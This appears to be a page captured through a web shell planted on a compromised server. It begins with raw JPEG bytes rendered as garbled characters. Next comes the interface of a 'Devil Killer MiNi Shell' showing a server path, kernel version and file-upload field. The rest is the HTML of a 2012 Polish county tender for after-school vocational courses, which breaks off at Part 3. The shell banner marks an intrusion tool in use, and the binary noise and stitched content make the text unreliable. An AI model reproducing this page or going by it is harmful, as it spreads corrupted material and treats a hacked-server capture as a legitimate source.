JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/318074-N-2012.html

<p class="kh_header"><b>Kluczbork: Przeprowadzenie zajęć pozalekcyjnych w ramach realizacji projektu Zawodowy Start w Przyszłość</b><br>
<b>Numer ogłoszenia: 318074 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kluczborski , ul. Katowicka 1, 46-200 Kluczbork, woj. opolskie, tel. 0-77 4185218, faks 0-77 4186520.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatkluczborski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć pozalekcyjnych w ramach realizacji projektu Zawodowy Start w Przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa organizacji i przeprowadzenia zajęć pozalekcyjnych dla uczniów dwóch Zespołów Szkół Powiatu Kluczborskiego tj. Zespołu Szkół Licealno-Technicznych (ZSL-T) i Zespołu Szkół Ponadgimnazjalnych Nr 2 Centrum Kształcenia Ustawicznego (ZSP nr 2 CKU) w Kluczborku. Szkolenia mają się odbywać sukcesywnie w okresie od września 2012r. do czerwca 2014r. w ramach projektu Zawodowy Start w Przyszłość współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.

Wykonawca na czas trwania szkoleń jest zobowiązany w szczególności do: 
(PONIŻSZE DOTYCZY KAŻDEJ Z CZĘŚCI ZAMÓWIENIA

1) obowiązkowo w ramach każdego szkolenia (każdej z części zamówienia) zapewienia dla każdego uczestnika szkolenia materiałów szkoleniowych do zajęć, które po zakończeniu szkolenia przejdą w posiadanie uczestników szkolenia. 
Materiały muszą zostać oznaczone zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki; Dodatkowy 1 gratisowy komplet materiałów szkoleniowych Wykonawca przekaże Zamawiającemu.
Za materiały szkoleniowe Zamawiający uważa przygotowane przez Wykonawcę wydruki kolorowe, czarno białe oraz kserokopie, materiały dydaktyczne - opisy, notatnik, długopis, które zostaną wydane uczestnikom szkoleń, jak również prezentacje i wizualizacje multimedialne z przygotowaniem oraz publikacją materiałów cyfrowych.  
2) wydania dokumentów świadczących o ukończeniu szkolenia tzn. dla wszystkich uczestników certyfikatu o ukończeniu danego szkolenia;
3) świadczenia usług zgodnie z zaakceptowanym przez Zamawiającego szczegółowym programem zajęć; 
4) przeprowadzenia zajęć pozalekcyjnych w godzinach popołudniowych dla poszczególnych grup od poniedziałku do piątku (z wyłączeniem sobót, niedziel i świąt, ferii, wakacji); z zastrzeżeniem, iż w przypadku Zamówienia w CZĘŚCI I za zgodą  zamawiającego, w przypadku gdy program zajęć będzie tego wymagał, dopuszcza się przeprowadzenie zajęć w dni wolne tj. w soboty. 
5) informowania poprzez umieszczenie na materiałach szkoleniowych dla każdego uczestnika szkolenia, dokumentach świadczących o ukończeniu szkolenia (certyfikatach), listach obecności uczestników oraz na wszelkich innych dokumentach dotyczących realizowanego zamówienia informacji o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego, zamieszczenie logo UE, PO KL zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki; 
6) niezwłocznego poinformowania Zamawiającego na piśmie o przerwaniu szkolenia przez uczestnika. W takim przypadku Zamawiający skieruje w jej miejsce następną osobę z listy rezerwowej a Wykonawca, jeśli jest to możliwe ze względu na zakres tematyczny i ilość zajęć, która już została przeprowadzona, dołoży wszelkich starań aby osoba dołączona do grupy uzupełniła zakres szkolenia, w którym nie uczestniczyła;
7) niezwłocznego informowania Zamawiającego telefonicznie oraz na piśmie o przypadkach dłuższej nieobecności uczestników na szkoleniu.
8) W przypadku realizacji zadań w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia wymaga się, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia oraz, że łączne zaangażowanie w realizację zadań projektowych nie przekracza 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania - dot. osób prowadzących zajęcia)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.31.00-0, 80.53.12.00-7, 80.58.00.00-3, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w przedmiotowym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu - według wzoru Zamawiającego - Załącznik  Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu - według wzoru Zamawiającego - Załącznik  Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu - według wzoru Zamawiającego - Załącznik  Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w przypadku gdy wykonawca przedłoży wraz z ofertą wykaz osób, które będą uczestniczyć w wykonywaniu Zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania Zamówienia, doświadczenia w prowadzeniu zajęć z zakresu zagadnień stanowiących przedmiot części zamówienia, na którą składana jest oferta, oraz informacją o podstawie do dysponowania tymi osobami wg Załącznika Nr 4 SIWZ;

Szczegółowe warunki dot. dysponowania osobami zdolnymi do wykonania zamówienia w odniesieniu do każdej części:

1)	ZAMÓWIENIA W CZĘŚCI NR I tj. zadania PN: PROJEKTOWANIE W AUTOCAD - ZASTOSOWANIA PRAKTYCZNE Z EGZAMINEM ECDL - 
Zamawiający żąda wskazania w wykazie, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą: 
-  wykształcenie wyższe techniczne (mechanika, budownictwo, architektura) ze względu na specyfikę zastosowania AutoCada i powiązanie obsługi programu z praktycznymi pracami projektowymi; 
-  przygotowanie pedagogiczne do prowadzenia zajęć objętych zamówieniem z młodzieżą w wieku 16-20 lat;
-  udokumentowane kwalifikacje znajomości AutoCada, stwierdzone certyfikatami autoryzowanymi przez AutoDesk instytucję. 
- udokumentowane, przynajmniej 3- letnie doświadczenie w prowadzeniu szkoleń  bądź zajęć z AutoCad z młodzieżą i dorosłymi  dla różnych grup odbiorców;



2) ZAMÓWIENIA W CZĘŚCI NR II tj. zadania PN: PROGRAMOWANIE OBRABIAREK STEROWANYCH NUMERYCZNIE CNC -
Zamawiający żąda wskazania w wykazie, że Wykonawca dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia posiadającą:
- wykształcenie wyższe techniczne (mechanika, budownictwo, architektura), 
- przygotowanie pedagogiczne do prowadzenia zajęć objętych zamówieniem z młodzieżą w wieku 16-20 lat;
- udokumentowane, przynajmniej 3 letnie doświadczenie w prowadzeniu szkoleń bądź zajęć z przedmiotowego zakresu z młodzieżą i dorosłymi  dla różnych grup odbiorców.

3) ZAMÓWIENIA W CZĘŚCI NR III tj. zadania PN: JĘZYK ANGIELSKI W ZASTOSOWANIACH TECHNICZNYCH - 
Zamawiający żąda wskazania w wykazie, że Wykonawca dysponuje co najmniej 1 osobą z wykształceniem wyższym magisterskim z języka angielskiego z przygotowaniem pedagogicznym oraz minimum 3- letnie doświadczenie w prowadzeniu zajęć z przedmiotowego zakresu z młodzieżą i dorosłymi  dla różnych grup odbiorców. 


4) ZAMÓWIENIA W CZĘŚCI NR IV tj. zadania PN: WARSZTATY DORADZTWA EDUKACYJNO-ZAWODOWEGO ZADBAJ O SWOJĄ PRZYSZŁOŚĆ - 
Zamawiający żąda wskazania w wykazie, że Wykonawca dysponuje dysponowanie co najmniej 1 osobą uprawnioną do przeprowadzenia warsztatów posiadającą:
-  wykształcenie wyższe magisterskie lub podyplomowe z zakresu szkolnego doradztwa zawodowego bądź kierunkowe z przygotowaniem pedagogicznym do prowadzenia zajęć objętych zamówieniem, 
-  udokumentowane, przynajmniej 3 letnie doświadczenie w prowadzeniu warsztatów bądź zajęć z przedmiotowego zakresu z młodzieżą i dorosłymi  dla różnych grup odbiorców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu - według wzoru Zamawiającego Załącznik  Nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty. Zmiany mogą dotyczyć:
a) terminu wykonania usług w przypadku wystąpienia okoliczności nieprzewidywalnych w dniu udzielenia zamówienia lub gdy ze względów organizacyjnych nie będzie możliwe przeprowadzenie poszczególnych zajęć w terminach podanych w niniejszej SIWZ, wówczas Zamawiający dopuszcza zmianę terminów realizacji. Nowe terminy muszą uzyskać zgodę Zamawiającego.
b) zmiany programu gdy ze względów niezależnych od Wykonawcy nie będzie możliwe przeprowadzenie szkoleń w takim zakresie jak podany w SIWZ, dotyczy zmiany programu i świadczeń poszczególnych zajęć.  Jakakolwiek zmiana musi uzyskać aprobatę Zamawiającego.
c) zmiany wynagrodzenia w przypadku zmiany przepisów o podatkach,
d) zmiany osób występujących po stronie Zamawiającego i Wykonawcy w przypadku wystąpienia zdarzeń losowych. W przypadku Wykonawcy np. gdy ze względu na dłuższą nieobecność osoby prowadzącej wskazanej w ofercie (macierzyństwo, choroba, itp. zdarzenia losowe) nie będzie możliwe prowadzenie przez nią zajęć wówczas osoba ta ulegnie zmianie na inną, która będzie musiała spełniać warunki udziału w postępowaniu;
e) sposobu fakturowania usług,
f) zmiany miejsca prowadzenia szkolenia w przypadku wystąpienia zdarzeń losowych uniemożliwiających przeprowadzenie szkoleń w pierwotnie wskazanym miejscu. 
g) zaistnieją  inne  zdarzenia pod warunkiem, że nie spowoduje to zmian w przedmiocie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatkluczborski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe 
ul.Katowicka 1
46-200 Kluczbork.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2012 godzina 09:30, miejsce: Starostwo Powiatowe 
ul.Katowicka 1
46-200 Kluczbork pok. nr 211 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn:  Zawodowy Start w Przyszłość współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PROJEKTOWANIE W AUTOCAD - ZASTOSOWANIA PRAKTYCZNE Z EGZAMINEM ECDL W ZAKRESIE GRAFIKI WEKTOROWEJ AUTOCAD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoleniem objęte będą 4 grupy 10 osobowe w wymiarze 110 godzin na grupę w okresie od września 2012r. do czerwca 2014r. Zajęcia odbywać się będą w Zespole Szkół Licealno-Technicznych w Kluczborku. Program nauczania obejmować będzie między innymi zastosowanie grafiki wektorowej 2D i 3D tzn. obsługa interfejsu użytkownika, idea warstw, szablonów, stylów, bloków z atrybutami, narzędzia zmiany i rysowania precyzyjnego, tworzenie i modyfikacja obiektów, tworzenie własnych projektów. Łączna liczba godzin w okresie realizacji projektu wynosi 440 godzin lekcyjnych. (1 godzina lekcyjna równa się 45 min). Zajęcia odbywać się będą poza lekcjami w godzinach popołudniowych w cyklach 4 godzinnych sporadycznie 8 - mio godzinne w sobotę, ze względu na dłuższe prace projektowe. Zajęcia w poszczególnych grupach nie będą się pokrywały tj. nie będą się odbywały w tym samym czasie.  Zamawiający może przeznaczyć na realizację zadania środki w wysokości, brutto 120,00 zł za godzinę przeprowadzonych zajęć. Powyższa cena nie obejmuje materiałów poglądowych i szkoleniowych. 

Osoba prowadząca zajęcia pozalekcyjne będzie odpowiadała za: 
1) przeprowadzenie wśród uczniów dostarczonych przez koordynatora wstępnych (na pierwszych zajęciach) i końcowych (na ostatnich zajęciach) ankiet oraz przeprowadzenie testów sprawdzających wiedzę uczniów oraz ich weryfikację; 
2) bieżącą analizę wykonywanych projektów - raz w miesiącu, 
3) ocenę poziomu przygotowania do egzaminu ECDL - raz na kwartał test sprawdzający; 
4) przygotowanie, realizację i dokumentację zajęć dla uczniów (w tym zobowiązany będzie do wypełniania Dziennika zajęć; W przypadku realizacji zadań w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia wymaga się, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia oraz, że łączne zaangażowanie w realizację zadań projektowych nie przekracza 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania- dot. osób prowadzących zajęcia)
5) dbanie i prawidłowe korzystanie ze sprzętu wykorzystywanego do prowadzenia zajęć   
    będącego na stanie Zespołu Szkół Licealno-Technicznych;
6) przestrzeganie regulaminu sali/pomieszczenia, w którym będą prowadzone zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PROGRAMOWANIE OBRABIAREK STEROWANYCH NUMERYCZNIE CNC..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie obejmować będzie 45 godzin na grupę zajęć pozalekcyjnych dla 4 grup po 10 osób w okresie od września 2012r. do czerwca 2014r. Zajęcia odbywać się będą w godzinach popołudniowych. Planowanych jest 60 zajęć 3- godzinnych w całym szkoleniu.  
Ramowy program nauczania: technologiczne przygotowanie procesu obróbczego, wypracowanie programu komputerowego CAD/CAM, realizacja programu na obrabiarce CNC. 
Łączna liczba godzin w okresie realizacji projektu wynosi 180 godzin lekcyjnych. 
(1 godzina lekcyjna równa się 45 min). Zamawiający może przeznaczyć na realizację zadania środki w wysokości, brutto 120,00 zł za godzinę przeprowadzonych zajęć. Powyższa cena nie obejmuje materiałów poglądowych i szkoleniowych. 

UWAGA: ZAJĘCIA MUSZĄ BYĆ PROWADZONE W ZESPOLE SZKÓŁ PONADGIMNAZJALNYCH NR 2 CKU W KLUCZBORKU W PRACOWNI OBRABIAREK STEROWANYCH NUMERYCZNIE. W PRACOWNI TEJ ZAJĘCIA BĘDĄ PROWADZONE NA CENTRUM OBRÓBCZYM FIRMY DIGIMA ORAZ TOKARCE RÓWNIEŻ FIRMY DIGIMA A TAKŻE NA STANOWISKACH KOMPUTEROWYCH Z OPROGRAMOWANIEM SURFUN.

Osoba prowadząca zajęcia pozalekcyjne będzie odpowiadała za:
1)	dbanie i prawidłowe korzystanie ze sprzętu wykorzystywanego do prowadzenia zajęć będącego na stanie Zespołu Szkół Ponadgimnazjalnych Nr 2 CKU;
2)	przeprowadzenie wśród uczniów dostarczonych przez koordynatora ankiet oraz przeprowadzenie testów sprawdzających wiedzę uczniów raz na kwartał, oraz ich weryfikację; 
3)	przygotowanie, realizację i dokumentację zajęć dla uczniów (w tym zobowiązany będzie do wypełniania Dziennika zajęć; W przypadku realizacji zadań w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia wymaga się, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia oraz, że łączne zaangażowanie w realizację zadań projektowych nie przekracza 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania- dot. osób prowadzących zajęcia)
4)   przestrzeganie regulaminu sali/pomieszczenia, w którym będą prowadzone zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.12.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> JĘZYK ANGIELSKI W ZASTOSOWANIACH TECHNICZNYCH.</p>
